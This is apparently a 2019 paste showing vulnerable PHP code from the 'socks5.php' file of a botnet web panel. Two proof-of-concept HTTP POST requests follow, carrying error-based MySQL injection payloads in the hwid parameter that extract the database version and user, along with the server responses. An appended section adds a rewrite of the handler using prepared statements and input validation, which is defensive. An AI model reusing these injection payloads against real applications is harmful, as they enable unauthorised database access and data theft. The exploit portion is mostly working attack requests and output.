nihil7771

SQLi

Feb 17th, 2019
# Vuln-Code:
# All POST parameters in the file "socks5.php" are vulnerable to SQL injection
#
# if(!empty($_POST['hwid']) && !empty($_POST['cn']) && !empty($_POST['ip']) && !empty($_POST['port']))
# {
#     $query = mysql_query("SELECT * FROM hydra_socks WHERE hwid = '".$_POST['hwid']."'");
#     if(mysql_num_rows($query) >= 1)
#     {
#         $sql = mysql_query("UPDATE hydra_socks SET ip = '".$_POST['ip']."', port = '".$_POST['port']."' WHERE hwid = '".$_POST['hwid']."'");
#     }
#     else
#     {
#         $sql = mysql_query("INSERT INTO hydra_socks (`hwid`, `country`, `ip`, `port`) VALUES ('".$_POST['hwid']."', '".$_POST['cn']."', '".$_POST['ip']."', '".$_POST['port']."')");
#     }
#     if(!$sql)
#     {
#         echo "fail";
#         echo mysql_error();
#     }
##############################Exploit########################################
#
# PoC 1 - Gets the MySQL Version Information:
POST http://127.0.0.1/cythosia/Webpanel/socks5.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 322
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Miauu
Connection: Close

hwid=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cversion%28%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271&cn=test&ip=test&port=test
Response:
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in C:xamppneuhtdocscythosiaWebpanelsocks5.php on line 11
failDuplicate entry '~'5.5.32'~1' for key 'group_key'
# PoC 2 - whoami?

POST /cythosia/Webpanel/socks5.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 319
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Connection: Close

hwid=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cuser%28%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271&cn=test&ip=test&port=test
Response:
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in C:xampphtdocscythosiaWebpanelsocks5.php on line 11
failDuplicate entry '~'root@localhost'~1' for key 'group_key'

#############################################
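
Added example, not part of the original paste or the panel's code: the handler logic from the Vuln-Code section rewritten with bound parameters, input validation, and no echoing of driver errors to the client. The function name register_socks, the PDO handle and the in-memory SQLite database (standing in for the panel's MySQL) are assumptions, and the sample inputs are constructed.

```php
<?php
declare(strict_types=1);
// Added example (not the original panel code). register_socks() and the
// PDO/SQLite setup are assumptions made so the block runs on its own.
function register_socks(PDO $db, array $post): bool
{
    foreach (['hwid', 'cn', 'ip', 'port'] as $key) {
        if (empty($post[$key]) || !is_string($post[$key])) {
            return false;
        }
    }
    // Validate the shape of ip and port before touching the database.
    $ip   = filter_var($post['ip'], FILTER_VALIDATE_IP);
    $port = filter_var($post['port'], FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1, 'max_range' => 65535]]);
    if ($ip === false || $port === false) {
        return false;
    }
    try {
        // Placeholders keep hwid and cn as data; they never become SQL text.
        $sel = $db->prepare('SELECT 1 FROM hydra_socks WHERE hwid = ?');
        $sel->execute([$post['hwid']]);
        if ($sel->fetchColumn() !== false) {
            $stmt = $db->prepare('UPDATE hydra_socks SET ip = ?, port = ? WHERE hwid = ?');
            $stmt->execute([$ip, $port, $post['hwid']]);
        } else {
            $stmt = $db->prepare('INSERT INTO hydra_socks (hwid, country, ip, port) VALUES (?, ?, ?, ?)');
            $stmt->execute([$post['hwid'], $post['cn'], $ip, $port]);
        }
        return true;
    } catch (PDOException $e) {
        // Log server-side only; the original echoed mysql_error() to the client.
        error_log('socks5 register failed: ' . $e->getMessage());
        return false;
    }
}

// Constructed demo: in-memory SQLite stands in for the panel's MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE hydra_socks (hwid TEXT, country TEXT, ip TEXT, port INTEGER)');
// Constructed input: a quote-bearing hwid that would alter the string-built query.
$quoted = ['hwid' => "1' and '1'='1", 'cn' => 'test', 'ip' => '192.0.2.10', 'port' => '1080'];
var_dump(register_socks($db, $quoted)); // accepted; hwid is stored as literal text
var_dump(register_socks($db, ['hwid' => 'x', 'cn' => 'test', 'ip' => 'test', 'port' => 'test'])); // fails validation
var_dump($db->query('SELECT hwid FROM hydra_socks')->fetchColumn());
```

Against MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the server, not the client library, binds the values.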